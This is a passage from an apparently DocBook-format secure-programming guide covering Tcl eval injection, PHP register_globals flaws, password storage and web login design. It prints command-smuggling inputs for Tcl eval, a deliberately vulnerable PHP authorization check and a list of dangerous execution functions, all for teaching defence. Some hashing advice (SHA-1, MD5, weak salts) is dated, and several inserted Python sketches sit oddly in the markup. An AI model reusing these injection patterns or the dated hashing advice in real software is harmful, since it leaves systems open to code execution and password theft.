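The following is only a sketch: the class PortList, its methods, and the
port range check are invented for illustration and are not taken from
Gong, McGraw, or Sun's guidance.
<programlisting width="71">
<![CDATA[
// Hypothetical class for illustration; the name, field and the
// port range check are assumptions, not part of any real API.
final class PortList {
    // Private, and never handed out directly.
    private final int[] ports;

    public PortList(int[] suppliedPorts) {
        // Copy first, then validate the copy, so the caller
        // cannot change the data between the check and the use.
        int[] copy = suppliedPorts.clone();
        for (int port : copy) {
            if (port < 1 || port > 65535) {
                throw new IllegalArgumentException(
                    "invalid port: " + port);
            }
        }
        this.ports = copy;
    }

    // Return a copy, so callers cannot modify the internal array.
    public int[] getPorts() {
        return ports.clone();
    }

    // Compare Class objects, not class names.
    public boolean hasSameClassAs(Object other) {
        return other != null && getClass() == other.getClass();
    }
}
]]>
</programlisting>
Cloning an array of primitives is sufficient here; an array of mutable
objects would need each element copied as well, and a user-written
clone method on those elements should not be trusted.
</para>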

</sect1>

<sect1 id="tcl">
<title>Tcl</title>
<para>
Tcl stands for ``tool command language'' and is pronounced ``tickle.''
Tcl is divided into two parts: a language and a library.
The language is a simple language, originally intended for issuing commands
to interactive programs and including basic programming capabilities.
The library can be embedded in application programs.
You can find more information about Tcl at sites such as
<ulink url="http://www.tcl.tk/">Tcl.tk</ulink>, the
<ulink url="http://www.sco.com/Technology/tcl/Tcl.html">Tcl WWW Info</ulink>
web page, and the comp.lang.tcl FAQ launch page at
<ulink url="http://www.tclfaq.wservice.com/tcl-faq">http://www.tclfaq.wservice.com/tcl-faq</ulink>.
My thanks go to Wojciech Kocjan for providing some of this detailed
information on using Tcl in secure applications.
</para>

<para>
For some security applications, especially interesting components of Tcl
are Safe-Tcl (which creates a sandbox in Tcl)
and Safe-TK (which implements a sandboxed portable GUI for Safe Tcl), as
well as the WebWiseTclTk Toolkit which permits Tcl packages to be automatically
located and loaded from anywhere on the World Wide Web.
You can find more about the latter from
<ulink url="http://www.cbl.ncsu.edu/software/WebWiseTclTk">http://www.cbl.ncsu.edu/software/WebWiseTclTk</ulink>.
It's not clear to me how much code review this has received.
</para>

<para>
Tcl's original design goal to be a small, simple
language resulted in a language that was originally somewhat limiting
and slow.
For an example of the limiting weaknesses in the original language, see
<ulink url="http://sdg.lcs.mit.edu/~jchapin/6853-FT97/Papers/stallman-tcl.html">
Richard Stallman's ``Why You Should Not Use Tcl''</ulink>.
For example, Tcl was originally designed to really support only
one data type (string).
Thankfully, these issues have been addressed over time.
In particular, version 8.0 added support for more data types
(integers are stored internally as integers, lists as lists and so on).
This improves its capabilities, and in particular improves its speed.
</para>

<para>
As with essentially all scripting languages,
Tcl has an "eval" command that parses and executes arbitrary Tcl commands.
And like all such scripting languages, this eval command needs to be
used especially carefully, or an attacker could insert
characters in the input to cause malicious things to occur.
For example, an attacker may be able to insert characters
with special meaning to Tcl
such as embedded whitespace (including space and newline),
double-quote, curly braces, square brackets,
dollar signs, backslash, semicolon, or pound sign (or create input
to cause these characters to be created during processing).
This also applies to any function that passes data to eval
(depending on how eval is called).
</para>

<para>
Here is a small example that may make this concept clearer;
first, let's define a small function and then interactively invoke it
directly - note that these uses are fine:
<programlisting width="65">
<![CDATA[
 proc something {a b c d e} {
       puts "A='$a'"
       puts "B='$b'"
       puts "C='$c'"
       puts "D='$d'"
       puts "E='$e'"
 }

 % # This works normally:
 % something "test 1" "test2" "t3" "t4" "t5"
 A='test 1'
 B='test2'
 C='t3'
 D='t4'
 E='t5'

 % # Imagine that str1 is set by an attacker:
 % set str1 {test 1 [puts HELLOWORLD]}

 % # This works as well
 % something $str1 t2 t3 t4 t5
 A='test 1 [puts HELLOWORLD]'
 B='t2'
 C='t3'
 D='t4'
 E='t5'
]]>
</programlisting>

However, continuing the example, let's see how "eval"
can be incorrectly and correctly called.
If you call eval in an incorrect (dangerous) way, it
allows attackers to misuse it.
However, by using commands like list or lrange to correctly
group the input, you can avoid this problem:

<programlisting width="65">
<![CDATA[
 % # This is the WRONG way - str1 is interpreted.
 % eval something $str1 t2 t3
 HELLOWORLD
 A='test'
 B='1'
 C=''
 D='t2'
 E='t3'

 % # Here's one solution, using "list".
 % eval something [list $str1 t2 t3 t4 t5]
 A='test 1 [puts HELLOWORLD]'
 B='t2'
 C='t3'
 D='t4'
 E='t5'

 % # Here's another solution, using lrange:
 % eval something [lrange $str1 0 end] t2
 A='test'
 B='1'
 C='[puts'
 D='HELLOWORLD]'
 E='t2'
]]>
</programlisting>
Using lrange is useful when concatenating arguments to a called
function, e.g., with more complex libraries using callbacks.
In Tcl, eval is often used to create a one-argument version of a function
that takes a variable number of arguments, and you need to be careful
when using it this way.
Here's another example (presuming that you've defined a "printf" function):
<programlisting width="65">
<![CDATA[
 proc vprintf {str arglist} {
      eval printf [list $str] [lrange $arglist 0 end]
 }

 % printf "1+1=%d  2+2=%d" 2 4
 % vprintf "1+1=%d  2+2=%d" {2 4}
]]>
</programlisting>
</para>

<para>
Fundamentally, when passing a command that will be eventually
evaluated, you must pass Tcl commands as a properly built list,
and not as a (possibly concatenated) string.
For example, the "after" command runs a Tcl command after a given
number of milliseconds; if the data in $param1 can be controlled by
an attacker, this Tcl code is dangerously wrong:
<programlisting width="65">
<![CDATA[
  # DON'T DO THIS if param1 can be controlled by an attacker
  after 1000 "someCommand someparam $param1"
]]>
</programlisting>
This is wrong, because if an attacker can control the value of $param1,
the attacker can control the program.
For example, if the attacker can cause $param1 to have
'[exit]', then the program will exit.
Likewise, if $param1 were '; exit', the program would also exit.
</para>

<para>
Thus, the proper alternative would be:
<programlisting width="65">
<![CDATA[
 after 1000 [list someCommand someparam $param1]
]]>
</programlisting>
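If the command prefix is built separately (say, so it can be reused),
append the untrusted value as a single list element, because
concat on its own does not quote its arguments:
<programlisting width="65">
<![CDATA[
 set cmd [list someCommand someparam]
 after 1000 [concat $cmd [list $param1]]
]]>
</programlisting>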
</para>

<para>
Here's another example showing what you shouldn't do,
pretending that $params is data controlled by a possibly malicious user:
<programlisting width="65">
<![CDATA[
 set params "%-20s TESTINGSTRING"
 puts "'[eval format $params]'"
]]>
</programlisting>
will result in:
<programlisting width="65">
<![CDATA[
 'TESTINGSTRING       '
]]>
</programlisting>
But if the untrusted user sends data with an embedded newline,
like this:
<programlisting width="65">
<![CDATA[
 set params "%-20s TESTINGSTRING\nputs HELLOWORLD"
 puts "'[eval format $params]'"
]]>
</programlisting>
The result will be this (notice that the attacker's code was executed,
and that the formatted text is lost because eval returns the result
of the last command it ran, here the attacker's puts):
<programlisting width="65">
<![CDATA[
 HELLOWORLD
 ''
]]>
</programlisting>
Wojciech Kocjan suggests that the
simplest solution in this case is to convert this to a list using
lrange, doing this:
<programlisting width="65">
<![CDATA[
 set params "%-20s TESTINGSTRING\nputs HELLOWORLD"
 puts "'[eval format [lrange $params 0 end]]'"
]]>
</programlisting>
The result would be:
<programlisting width="65">
<![CDATA[
 'TESTINGSTRING       '
]]>
</programlisting>
Note that this solution presumes that the potentially malicious
text is concatenated to the end of the text; as with all languages,
make sure the attacker cannot control the format text.
</para>

<para>
As a matter of style always use curly braces
when using if, while, for, expr, and any other command which
parses an argument using expr/eval/subst.
Doing this will avoid
a common error when using Tcl called unintended double substitution
(aka double substitution).
This is best explained by example; the following code is incorrect:
<programlisting width="65">
<![CDATA[
 while ![eof $file] {
     set line [gets $file]
 }
]]>
</programlisting>
The code is incorrect because the "![eof $file]" text will be evaluated
by the Tcl parser when the while command is executed the first time,
and not re-evaluated in every iteration as it should be.
Instead, do this:
<programlisting width="65">
<![CDATA[
 while {![eof $file]} {
      set line [gets $file]
 }
]]>
</programlisting>
Note that both the condition, and the action to be performed,
are surrounded by curly braces.
Although there are cases where the braces are redundant, they never hurt,
and when you fail to include the curly braces where they're needed
(say, when making a minor change) subtle and hard-to-find
errors often result.
</para>

<para>
More information on good Tcl style can be found in documents such as
<ulink url="http://www.tcl.tk/doc/styleGuide.pdf">
Ray Johnson's Tcl Style Guide</ulink>.
</para>

<para>
In the past, I have stated that
I don't recommend Tcl for writing programs which must
mediate a security boundary.
Tcl seems to have improved since that time, so while I cannot guarantee
Tcl will work for your needs, I can't guarantee that any other language
will work for you either.
Again, my thanks to Wojciech Kocjan who provided some
of these suggestions on how to
write Tcl code for secure applications.
</para>
</sect1>

<sect1 id="PHP">
<title>PHP</title>

<para>
SecureReality has put out a very interesting paper titled
``A Study In Scarlet - Exploiting Common Vulnerabilities in PHP''
[Clowes 2001],
which discusses some of the problems in writing secure programs in PHP,
particularly in versions before PHP 4.1.0.
Clowes concludes that
``it is very hard to write a secure PHP application (in the
default configuration of PHP), even if you try''.
</para>

<para>
Granted, there are security issues in any language, but one
particular issue stands out in older versions of PHP that arguably makes
older PHP versions
less secure than most languages: the way it loads data into its namespace.
By default, in PHP (versions 4.1.0 and lower)
all environment variables and values sent to PHP over the web
are automatically loaded into the same namespace (global variables)
that normal variables are loaded into - so attackers can set arbitrary
variables to arbitrary values, which keep their values unless explicitly
reset by a PHP program.
In addition, PHP automatically creates variables with a
default value when they're first requested, so
it's common for PHP programs to not initialize variables.
If you forget to set a variable, PHP can report it, but
by default PHP won't - and note that this is simply an error report; it
won't stop an attacker who finds an unusual way to cause it.
Thus, by default PHP allows an attacker to
completely control the values of all variables in a program unless
the program takes special care to override the attacker.
Once the program takes over, it can reset these variables,
but failing to reset
any variable (even one not obvious) might open a vulnerability in the
PHP program.
</para>

<para>
For example, the following PHP program (an example from Clowes)
intends to let only those who
know the password get some important information, but an attacker
can set ``auth'' in their web browser and subvert the authorization check:
<programlisting width="65">
<![CDATA[
 <?php
  if ($pass == "hello")
   $auth = 1;
  ...
  if ($auth == 1)
   echo "some important information";
 ?>
]]>
</programlisting>
</para>

<para>
I and many others have complained about this particularly
dangerous problem; it's particularly a problem because
PHP is widely used.
A language that's supposed to be easy to use had better make
it easy to write secure programs, after all.
It's possible to disable this misfeature in PHP by turning the setting
``register_globals'' to ``off'', but PHP versions up through 4.1.0
set this to ``on'' by default, and PHP before 4.1.0 is harder
to use with register_globals off.
The PHP developers warned in their PHP 4.1.0 announcement that
``as of the next semi-major version of PHP, new installations of PHP will
default to having register_globals set to off.''
This has now happened; as of PHP version 4.2.0, external
variables (from the environment, the HTTP request, cookies or the web
server) are no longer registered in the global scope by default. The
preferred method of accessing these external variables is by using the new
Superglobal arrays, introduced in PHP 4.1.0.
<!--
http://linuxtoday.com/news_story.php3?ltsn=2002-04-23-016-26-NW-DV
-->
</para>

<para>
PHP with ``register_globals'' set to ``on'' is a dangerous choice
for nontrivial programs - it's just too easy to write insecure programs.
However, once ``register_globals'' is set to ``off'', PHP is quite
a reasonable language for development.
</para>


<para>
The secure default should include setting
``register_globals'' to ``off'', and also including several functions to
make it much easier for users to specify and limit the input they'll
accept from external sources.
Then web servers (such as Apache) could separately configure this
secure PHP installation.
Routines could be placed in the PHP library to make it
easy for users to list the input variables they want to accept;
some functions could check the patterns these variables must have
and/or the type that the variable must be coerced to.
In my opinion, PHP is a bad choice for secure web development
if you set register_globals on.
</para>

<para>
As I suggested in earlier versions of this book,
PHP has been trivially modified to become a reasonable choice
for secure web development.
However, note that PHP doesn't have a particularly good
security vulnerability track record
(e.g., register_globals, a file upload problem, and a format
string problem in the error reporting library);
I believe that security issues were not considered sufficiently in
early editions of PHP;
I also think that the PHP developers are now emphasizing security
and that these security issues are finally getting worked out.
One piece of evidence is the major change that the PHP developers have made to
turn off register_globals by default; this had a significant impact on
PHP users, and their willingness to make this change is a good sign.
Unfortunately, it's not yet clear how secure PHP really is;
PHP just hasn't had much of a track record now that the developers
of PHP are examining it seriously for security issues.
Hopefully this will become clear quickly.
</para>

<para>
If you've decided to use PHP, here are some of my recommendations
(many of these recommendations are based on ways to counter
the issues that Clowes raises):
<itemizedlist>
<listitem><para>
Set the PHP configuration option
``register_globals'' off, and use PHP 4.2.0 or greater.
PHP 4.1.0 adds several special arrays, particularly $_REQUEST,
which makes it far simpler to develop software in PHP
when ``register_globals'' is off.
Setting register_globals off, which is the default in PHP 4.2.0,
completely eliminates the most common PHP attacks.
If you're assuming that register_globals is off, you should check for
this first (and halt if it's not true) - that way, people who install
your program will quickly know there's a problem.
Note that many third-party PHP applications cannot
work with this setting, so it can be difficult to
keep it off for an entire website.
It's possible to set register_globals off for only some programs.
For example, for Apache, you could insert these lines into the file .htaccess
in the PHP directory (or use Directory directives to control it further):
<programlisting>
 php_flag register_globals Off
 php_flag track_vars On
</programlisting>
However, the .htaccess file itself is ignored unless the Apache web server
is configured to permit overrides; often the Apache global configuration
is set so that AllowOverride is set to None.
So, for Apache users,
if you can convince your web hosting service to set ``AllowOverride Options''
in their configuration file (often /etc/httpd/conf/httpd.conf) for your
host, do that.
Then write helper functions to simplify loading the data you need
(and only that data).
</para></listitem>

<listitem><para>
If you must develop software where register_globals might be on while
running (e.g., a widely-deployed PHP application),
always set values not provided by the user.
Don't depend on PHP
default values, and don't trust any variable you haven't explicitly set.
Note that you have to do this for <emphasis>every</emphasis> entry point
(e.g., every PHP program or HTML file using PHP).
The best approach is to begin each PHP program by setting all variables
you'll be using, even if you're simply resetting them to the
usual default values (like "" or 0).
This includes global variables referenced in included files,
even all libraries, transitively.
Unfortunately, this makes this recommendation hard to do, because few
developers truly know and understand all global variables that may be used
by all functions they call.
One lesser alternative is to search through HTTP_GET_VARS, HTTP_POST_VARS,
HTTP_COOKIE_VARS, and HTTP_POST_FILES to see if the user provided the data -
but programmers often forget to check all sources, and what happens if
PHP adds a new data source
(e.g., HTTP_POST_FILES wasn't in old versions of PHP)?
Of course, this simply tells you how to make the best of a bad
situation; in case you haven't noticed yet, turn off
register_globals!
</para></listitem>

<listitem><para>
Set the error reporting level to E_ALL, and resolve all errors reported
by it during testing.
Among other things, this will complain about un-initialized variables,
which are a key issue in PHP.
This is a good idea anyway whenever you start using PHP, because
this helps debug programs, too.
There are many ways to set the error reporting level, including in the
``php.ini'' file (global), the ``httpd.conf'' file (single-host),
the ``.htaccess'' file (multi-host), or at the top of the script
through the error_reporting function.
I recommend setting the error reporting level in both the php.ini file
and also at the top of the script; that way, you're protected if
(1) you forget to insert the command at the top of the script, or (2) move the
program to another machine and forget to change the php.ini file.
Thus, every PHP program should begin like this:
<programlisting width="66">
  &lt;?php error_reporting(E_ALL);?&gt;
</programlisting>
It could be argued that this error reporting should be turned on
during development, but turned off when actually run on a real site
(since such error messages could give useful information to an attacker).
The problem is that if they're disabled during ``actual use'' it's all
too easy to leave them disabled during development.
So for the moment, I suggest the simple approach of including it
at every entry point.
A much better approach is to record all errors, but direct the error reports
so they're only included in a log file
(instead of having them reported to the attacker).
</para></listitem>

<listitem><para>
Filter any user information used to create filenames carefully, in
particular to prevent remote file access.
PHP by default comes with ``remote files'' functionality -- that means
that file-opening commands like fopen(), that in other languages can
only open local files, can actually be used to invoke web or ftp
requests from another site.
</para></listitem>

<listitem><para>
Do not use old-style PHP file uploads; use the HTTP_POST_FILES array
and related functions.
PHP supports file uploads by uploading the file to some
temporary directory with a special filename.
PHP originally set a collection of variables to indicate where that filename
was, but since an attacker can control variable names and their values,
attackers could use that ability to cause great mischief.
Instead, always use HTTP_POST_FILES and related functions to access
uploaded files.
Note that even in this case, PHP's approach permits attackers to
temporarily upload files to you with arbitrary content, which is
risky by itself.
</para></listitem>

<listitem><para>
Only place protected entry points in the document tree; place all
other code (which should be most of it) outside the document tree.
PHP has a history of unfortunate advice on this topic.
Originally, PHP users were supposed to use the ``.inc'' (include)
extension for ``included'' files, but these included files often had
passwords and other information, and Apache would just give requesters
the contents of the ``.inc'' files when asked to do so when they
were in the document tree.
Then developers gave all files a ``.php'' extension - which meant that the
contents weren't seen, but now files never meant to be entry points
became entry points and were sometimes exploitable.
As mentioned earlier, the usual security advice is the best:
place only the protected entry points (files) in the document tree, and
place other code (e.g., libraries) outside the document tree.
There shouldn't be any ``.inc'' files in the document tree at all.
</para></listitem>

<listitem><para>
Avoid the session mechanism.
The ``session'' mechanism is handy for storing persistent data, but
its current implementation has many problems.
First, by default sessions store information in temporary files - so
if you're on a multi-hosted system, you open yourself up to many attacks and
revelations.
Even those who aren't currently multi-hosted may find themselves
multi-hosted later!
You can "tie" this information into a database instead of the filesystem,
but if others on a multi-hosted database can access that database with the
same permissions, the problem is the same.
There are also ambiguities if you're not careful
(``is this the session value or an attacker's value''?)
and this is another case where an attacker can force a file or
key to reside
on the server with content of their choosing - a dangerous situation -
and the attacker can even control to some extent the name of the file or key
where this data will be placed.
</para></listitem>

<listitem><para>
For all inputs, check that they match a pattern for acceptability
(as with any language), and then use type casting to coerce non-string data
into the type it should have.
Develop ``helper'' functions to easily check and import a selected list
of (expected) inputs.
PHP is loosely typed, and this can cause trouble.
For example, if an input datum has the value "000", it won't be equal to "0"
nor is it empty().
This is particularly important for associative arrays, because their
indexes are strings; this means that $data["000"]
is different than $data["0"].
For example, to make sure $bar has type double (after making sure it
only has the format legal for a double):
<programlisting width="66">
  $bar = (double) $bar;
</programlisting>
</para></listitem>
<listitem><para>
Be especially careful of risky functions.
This includes those that perform PHP code execution
(e.g., require(), include(), eval(), preg_replace()),
command execution
(e.g., exec(), passthru(), the backtick operator, system(), and popen()),
and open files
(e.g., fopen(), readfile(), and file()).
This is not an exhaustive list!
</para></listitem>
<listitem><para>
Use the ``magic_quotes_gpc'' setting where appropriate - this eliminates
many kinds of attacks.
</para></listitem>
<listitem><para>
Avoid file uploads, and consider modifying the php.ini file to
disable them (file_uploads = Off).
File uploads have had security holes in the past, so on older versions of
PHP this is a necessity, and until more experience shows that they're safe,
disabling them isn't a bad idea.
Remember, in general, to secure a system you should disable or remove
anything you don't need.
<!--
http://lwn.net/2002/0307/a/php-upload.php3
-->
</para></listitem>
</itemizedlist>
</para>


</sect1>

</chapter>

<chapter id="special">
<title>Special Topics</title>

<epigraph>
<attribution>Proverbs 16:22 (NIV)</attribution>
<para>
Understanding is a fountain of life to those who have it,
but folly brings punishment to fools.
</para>
</epigraph>

<sect1 id="passwords">
<title>Passwords</title>

<para>
Where possible, don't write code to handle passwords.
In particular, if the application is local,
try to depend on the normal login authentication by a user.
If the application is a CGI script, try to depend on the web server to provide
the protection as much as possible -
but see below about handling authentication in a web server.
If the application is over a network, avoid sending the password as cleartext
(where possible) since it can
be easily captured by network sniffers and reused later.
``Encrypting'' a password using some key fixed in the algorithm or using
some sort of shrouding algorithm is essentially the same as sending the
password as cleartext.
</para>

<!-- ???: Show _HOW_ to use PAM to do simple password checking; the PAM
     docs are complex on this score.  Also show how to ``fall through''
     if you don't have PAM? -->

<para>
For networks, consider at least using digest passwords.
Digest passwords are passwords developed from hashes; typically the
server will send the client some data (e.g., date, time, name of server),
the client combines this data with the user password, the client hashes
this value (termed the ``digest password'')
and replies with just the hashed result to the server;
the server verifies this hash value.
This works, because the password is never actually sent in any form; the
password is just used to derive the hash value.
Digest passwords aren't considered ``encryption'' in
the usual sense and are usually accepted even in countries with laws
constraining encryption for confidentiality.
Digest passwords are vulnerable to active attack threats but
protect against passive network sniffers.
One weakness is that, for digest passwords
to work, the server must have all the unhashed passwords, making the server
a very tempting target for attack.
</para>
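
<para>
The exchange described above can be sketched as follows.
This is only an illustration under stated assumptions, not a standard
protocol: the function names, the use of SHA-256, the colon separator, and
the random value inside the challenge are all choices made for this example.
Note that the server side needs the unhashed password, which is exactly the
weakness just mentioned.
<programlisting><![CDATA[
```python
import hashlib
import hmac
import secrets


def make_challenge(server_name: str) -> str:
    """Server side: build fresh, unpredictable data to send to the client."""
    return f"{server_name}:{secrets.token_hex(16)}"


def digest_password(challenge: str, password: str) -> str:
    """Client side: hash the challenge combined with the user's password."""
    combined = f"{challenge}:{password}".encode("utf-8")
    return hashlib.sha256(combined).hexdigest()


def server_verify(challenge: str, stored_password: str, reply: str) -> bool:
    """Server side: recompute the digest from its own copy of the password."""
    expected = digest_password(challenge, stored_password)
    # Constant-time comparison of the two hex strings.
    return hmac.compare_digest(expected, reply)


# Example exchange (hypothetical server name and password).
challenge = make_challenge("server.example")
reply = digest_password(challenge, "correct horse")
```
]]></programlisting>
Only the challenge and the reply cross the network; because each challenge
is different, a reply captured by a passive sniffer is of no use for a
later login.
</para>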

<para>
If your application permits users to set their passwords, check
the passwords and permit only ``good'' passwords
(e.g., not in a dictionary, having certain minimal length, etc.).
You may want to look at information such as
<ulink
url="http://consult.cern.ch/writeup/security/security_3.html">http://consult.cern.ch/writeup/security/security_3.html</ulink>
on how to choose a good password.
You should use PAM if you can, because it supports pluggable password checkers.
</para>
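
<para>
If PAM is not available, a minimal check along the lines described above
might look like the following sketch.
The function name, the minimum length of 8, and the tiny word list are
assumptions made for illustration; a real checker would use a large
dictionary and additional rules.
<programlisting><![CDATA[
```python
def is_acceptable_password(password, dictionary_words, min_length=8):
    """Reject passwords that are too short or that appear in a word list.

    dictionary_words is assumed to be a set of lower-case words.
    """
    if len(password) < min_length:
        return False
    if password.lower() in dictionary_words:
        return False
    return True


# Hypothetical, very small word list for the example.
words = {"password", "sunshine", "dragonfly"}
```
]]></programlisting>
</para>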
</sect1>

<sect1 id="web-authentication">
<title>Authenticating on the Web</title>
<para>
On the web, a web server is usually authenticated to users by using SSL or TLS
and a server certificate - but it's not as easy to authenticate who
the users are.
SSL and TLS do support client-side certificates, but there are many practical
problems with actually using them (e.g., web browsers don't support a single
user certificate format and users find it difficult to install them).
You can learn about how to set up digital certificates from many places, e.g.,
<ulink url="http://www.petbrain.com/modules.php?op=modload&amp;name=pki&amp;file=index">Petbrain</ulink>.
Using Java or Javascript has its own problems, since many users disable them,
some firewalls filter them out, and they tend to be slow.
In most cases, requiring every user to install a plug-in is impractical too,
though if the system is only for an intranet for a relatively
small number of users this may be appropriate.
</para>

<para>
If you're building an intranet application, you should generally use
whatever authentication system is used by your users.
Unix-like systems tend to use Kerberos, NIS+, or LDAP.
You may also need to deal with Windows-based authentication schemes
(which can be viewed as proprietary variants of Kerberos and LDAP).
Thus, if your organization depends on Kerberos,
design your system to use Kerberos.
Try to separate the authentication system from the rest of your application,
since the organization may (will!) change their authentication system over
time.
</para>

<para>
Many techniques don't work or don't work very well.
One approach that works in some cases
is to use ``basic authentication'', which is built into
essentially all browsers and servers.
Unfortunately, basic authentication sends passwords unencrypted, so it
makes passwords easy to steal; basic authentication by itself is really
useful only for worthless information.
You could store authentication information in the URLs selected by the users,
but for most circumstances you should never do this - not only are
the URLs sent unprotected over the wire (as with basic authentication),
but there are too many other ways that
this information can leak to others
(e.g., through the browser history logs stored by many browsers,
logs of proxies, and to other web sites through the Referer: field).
You could wrap all communication with a web server using
an SSL/TLS connection (which would encrypt it); this is secure
(depending on how you do it), and it's
necessary if you have important data, but note that
this is costly in terms of performance.
You could also use ``digest authentication'', which exposes the communication
but at least authenticates the user without exposing the
underlying password used to authenticate the user.
Digest authentication is intended to be a simple partial solution for
low-value communications,
but digest authentication
is not widely supported in an interoperable way by web browsers and servers.
In fact, as noted in a March 18, 2002 eWeek article,
Microsoft's web client (Internet Explorer) and web server (IIS)
incorrectly implement the standard (RFC 2617), and thus won't work with
other servers or browsers. Since Microsoft
doesn't view this incorrect implementation as a serious
problem, it will be a very long time before most of their customers have
a correctly-working program.
<!-- http://www.eweek.com/article/0,3658,s=702&a=24177,00.asp -->
</para>

<para>
Thus, the most common technique for authenticating on the web today is
through cookies.
Cookies weren't really designed for this purpose, but they can be used
for authentication - but there are many wrong ways to use them that
create security vulnerabilities, so be careful.
For more information about cookies, see IETF RFC 2965, along with the
older specifications about them.
Note that to use cookies, some browsers (e.g., Microsoft
Internet Explorer 6) may insist that you
have a privacy profile (named p3p.xml on the root directory of the server).
</para>

<para>
Note that some users don't accept cookies, so this solution still has
some problems.
If you want to support these users,
you should send this authentication information back and forth via
HTML form hidden fields
(since nearly all browsers support them without concern).
You'd use the same approach as with cookies - you'd just use a different
technology to have the data sent from the user to the server.
Naturally, if you implement this approach, you need to include settings to
ensure that these pages aren't cached for use by others.
However, while I think avoiding cookies
is preferable, in practice these other approaches often require
much more development effort.
Since it's so hard to implement this on a large scale for many
application developers, I'm not currently stressing these approaches.
I would rather describe an approach that is reasonably secure and
reasonably easy to implement, than emphasize approaches that are too
hard to implement correctly (by either developers or users).
However, if you can do so without much effort, by all means support
sending the authentication information using form hidden fields and
an encrypted link (e.g., SSL/TLS).
As with all cookies, for these cookies you
should turn on the HttpOnly flag unless
you have a web browser script that must be able to read the cookie.
</para>
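
<para>
As a sketch of how such a cookie might be produced, the following uses
Python's standard http.cookies module to build the value of a Set-Cookie
header.
The cookie name ``auth'' and the helper name are assumptions for this
example; the ``secure'' flag is included on the assumption that the
cookie is only meant to travel over an encrypted link.
<programlisting><![CDATA[
```python
from http.cookies import SimpleCookie


def auth_cookie_header(token: str) -> str:
    """Return the value of a Set-Cookie header carrying the token."""
    cookie = SimpleCookie()
    cookie["auth"] = token
    cookie["auth"]["httponly"] = True   # hide the cookie from browser scripts
    cookie["auth"]["secure"] = True     # send it only over https: connections
    cookie["auth"]["path"] = "/"
    return cookie["auth"].OutputString()


header_value = auth_cookie_header("opaque-token-value")
```
]]></programlisting>
</para>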

<para>
Fu [2001] discusses client authentication on the web, along with a
suggested approach, and this is the approach I suggest for most sites.
The basic idea is that client authentication is split into two parts,
a ``login procedure'' and ``subsequent requests.''
In the login procedure, the server asks for the user's username and password,
the user provides them, and the server replies with an
``authentication token''.
In the subsequent requests, the client (web browser)
sends the authentication token
to the server (along with its request); the server verifies that the
token is valid, and if it is, services the request.
Another good source of information about web authentication is
Seifried [2001].
</para>

<para>
One serious problem with some web authentication techniques is that
they are vulnerable to a problem called "session fixation".
In a session fixation attack, the attacker fixes the user's session ID
before the user even logs into the target server, thus eliminating the
need to obtain the user's session ID afterwards.
Basically, the attacker obtains an account, and then tricks another
user into using the attacker's account - often by creating a special
hypertext link and tricking the user into clicking on it.
A good paper describing session fixation is the paper by
<ulink url="http://www.acros.si/papers/session_fixation.pdf">
Mitja Kolsek [2002]</ulink>.
A web authentication system you use should be resistant to session fixation.
</para>

<sect2 id="web-authentication-login">
<title>Authenticating on the Web: Logging In</title>
<para>
The login procedure is typically implemented as an HTML form;
I suggest using the field names ``username'' and ``password'' so that
web browsers can automatically perform some useful actions.
Make sure that the password is sent over an encrypted connection
(using SSL or TLS, through an https: connection) - otherwise, eavesdroppers
could collect the password.
Make sure all password text fields are marked as passwords in the HTML,
so that the password text is not visible to
anyone who can see the user's screen.
</para>

<para>
If both the username and password fields are filled in,
do not try to automatically log in as that user.
Instead, display the login form with the user and password fields;
this lets the user verify that they really want to log in as that user.
If you fail to do this, attackers will be able to exploit this weakness to
perform a session fixation attack.
Paranoid systems might want to simply ignore the password field and make the
user fill it in, but this interferes with browsers which can store
passwords for users.
</para>

<para>
When the user sends username and password, it must be checked against
the user account database.
This database shouldn't store the passwords ``in the clear'', since if
someone got a copy of this database they'd suddenly get everyone's
password (and users often reuse passwords).
Some use crypt() to handle this, but crypt can only handle a small
input, so I recommend using a different approach (this is my approach -
Fu [2001] doesn't discuss this).
Instead, the user database should store a username, salt, and
the password hash for that user.
The ``salt'' is just a random sequence of characters, used to make it
harder for attackers to determine a password even if they get the
password database - I suggest an 8-character random sequence.
It doesn't need to be cryptographically random, just different from
the salts of other users.
The password hash should be computed by concatenating
``server key1'', the user's password, and the salt, and
then running a cryptographically secure hash algorithm.
Server key1 is a secret key unique to this server - keep it separate
from the password database.
Someone who has server key1 could then run programs to crack user
passwords if they also had the password database;
since it doesn't need to be memorized, it can be a long and complex
password.
Most secure would be HMAC-SHA-1 or HMAC-MD5;
you could use SHA-1 (most web sites aren't really worried about
the attacks it allows) or MD5 (but MD5 would be a poorer choice;
see the discussion about MD5).
</para>

<para>
Thus, when users create their accounts, the password is hashed and
placed in the password database.
When users try to log in, the purported password is hashed and compared
against the hash in the database (they must be equal).
When users change their password, they should type in both the old
and new password, and the new password twice (to make sure they didn't
mistype it); and again, make sure none of these passwords' characters
are visible on the screen.
</para>
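
<para>
The account creation and login check just described could be sketched
like this.
It follows the scheme above (an 8-character salt, and HMAC-SHA-1 keyed
with server key1 over the password and salt), but the function names,
the in-memory dictionary standing in for the user database, and the key
value are all hypothetical.
<programlisting><![CDATA[
```python
import hashlib
import hmac
import secrets
import string

# Hypothetical value; the real key must be stored apart from the database.
SERVER_KEY1 = b"long-secret-kept-outside-the-password-database"


def new_salt(length: int = 8) -> str:
    """Return a random salt of letters and digits."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


def password_hash(password: str, salt: str) -> str:
    """HMAC-SHA-1, keyed with server key1, over the password and salt."""
    message = (password + salt).encode("utf-8")
    return hmac.new(SERVER_KEY1, message, hashlib.sha1).hexdigest()


def create_account(db: dict, username: str, password: str) -> None:
    """Store only the salt and the hash, never the password itself."""
    salt = new_salt()
    db[username] = (salt, password_hash(password, salt))


def check_login(db: dict, username: str, password: str) -> bool:
    """Hash the purported password and compare it with the stored hash."""
    record = db.get(username)
    if record is None:
        return False
    salt, stored = record
    return hmac.compare_digest(stored, password_hash(password, salt))


accounts = {}
create_account(accounts, "fred", "s3cret-Passphrase")
```
]]></programlisting>
</para>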

<para>
By default, don't save the passwords themselves on the client's
web browser using cookies - users may sometimes use shared clients
(say at some coffee shop).
If you want, you can give users the option of ``saving the password''
on their browser, but if you do, make sure that the password is set to
only be transmitted on ``secure'' connections, and make sure the user has
to specifically request it (don't do this by default).
</para>

<para>
Make sure that the page is marked to not be cached, or a proxy
server might re-serve that page to other users.
</para>

<para>
Once a user successfully logs in, the server needs to send the client
an ``authentication token'' in a cookie, which is described next.
</para>

</sect2>

<sect2 id="web-authentication-subsequent">
<title>Authenticating on the Web: Subsequent Actions</title>
<para>
Once a user logs in, the server sends back to the client a cookie
with an authentication token that will be used from then on.
